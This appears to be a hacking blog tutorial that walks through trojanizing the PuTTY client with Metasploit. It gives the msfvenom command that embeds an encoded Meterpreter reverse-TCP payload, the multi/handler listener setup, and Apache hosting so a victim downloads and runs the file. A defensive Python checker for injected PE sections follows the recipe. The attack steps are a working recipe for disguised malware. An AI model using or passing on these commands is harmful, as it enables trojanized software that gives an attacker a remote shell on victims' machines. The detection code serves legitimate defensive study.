
Backdooring a Legit application using Metasploit

Backdooring an Executable:

Creating a customized backdoored executable by hand used to take attackers a long time. The ability to embed a Metasploit payload in any executable you want is simply brilliant. When we say any executable, we mean any executable. You want to backdoor something you download from the internet?

We begin by downloading our legitimate executable, in this case the popular PuTTY client.

STEP 1:

Downloading PuTTY

wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe


STEP 2:

Start the Apache server using the following command:

service apache2 start

STEP 3:

Create the malicious executable using the following command:

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.43.15 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o puttyX.exe

Note: Replace the IP here with your own IP.

STEP 4:

Open msfconsole and type the following commands:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit

STEP 5:

Make sure that your files are saved in /var/www/html so that Apache serves them.

Access your malicious executable from the Windows machine and execute it.


As soon as the file executes, it opens a Meterpreter shell. Windows hacked.
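From the defender's side, template injection of the kind shown above typically leaves structural traces in the PE file: a new code section appended after the original ones, often reusing an existing section name, with the entry point redirected into it. The checker below is an added example, not code from this post or from Metasploit; it parses the section table with the standard library only, reports those traces, and includes a constructed PE header builder so it can be exercised offline (the exact section layout msfvenom produces is an assumption here, not something the post states).

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000

def parse_pe(data):
    """Return (entry_rva, sections); each section is (name, vaddr, vsize, rawsize, chars)."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]               # e_lfanew
    if data[:2] != b"MZ" or data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec, opt_size = struct.unpack_from("<H", data, pe_off + 6)[0], struct.unpack_from("<H", data, pe_off + 20)[0]
    entry = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]    # AddressOfEntryPoint (PE32 and PE32+)
    sections = []
    for i in range(nsec):
        off = pe_off + 24 + opt_size + 40 * i                      # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("latin-1")
        vsize, vaddr, rawsize, _, _, _, _, _, chars = struct.unpack_from("<IIIIIIHHI", data, off + 8)
        sections.append((name, vaddr, vsize, rawsize, chars))
    return entry, sections

def suspicious_indicators(data):
    """Structural traces of an injected code section. Heuristics, not proof of tampering."""
    entry, sections = parse_pe(data)
    findings = []
    exec_secs = [s[0] for s in sections if s[4] & IMAGE_SCN_MEM_EXECUTE]
    if len(exec_secs) > 1:
        findings.append("multiple executable sections: " + ", ".join(exec_secs))
    names = [s[0] for s in sections]
    dups = sorted({n for n in names if names.count(n) > 1})
    if dups:
        findings.append("duplicate section names: " + ", ".join(dups))
    home = next((s for s in sections if s[1] <= entry < s[1] + max(s[2], s[3])), None)
    if home is None:
        findings.append("entry point 0x%x lies outside every section" % entry)
    elif home is sections[-1] and len(sections) > 1:
        findings.append("entry point lies in the last section %r" % home[0])
    return findings

def build_pe(sections, entry_rva):
    """Constructed sample: a bare PE32 header with the given (name, vaddr, vsize, chars) sections."""
    opt = bytearray(224)                                           # PE32 optional header size
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                     # AddressOfEntryPoint
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(opt), 0x102)
    img = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0" + coff + bytes(opt)
    for name, vaddr, vsize, chars in sections:
        img += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, vaddr, vsize, 0, 0, 0, 0, 0, chars)
    return img
```

Run it over a downloaded binary with suspicious_indicators(open(path, "rb").read()). A non-empty findings list is a cue to verify the vendor's Authenticode signature and published hashes, not a verdict on its own.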



Happy Hacking ☺

Feel free to post your queries in the comment section below.
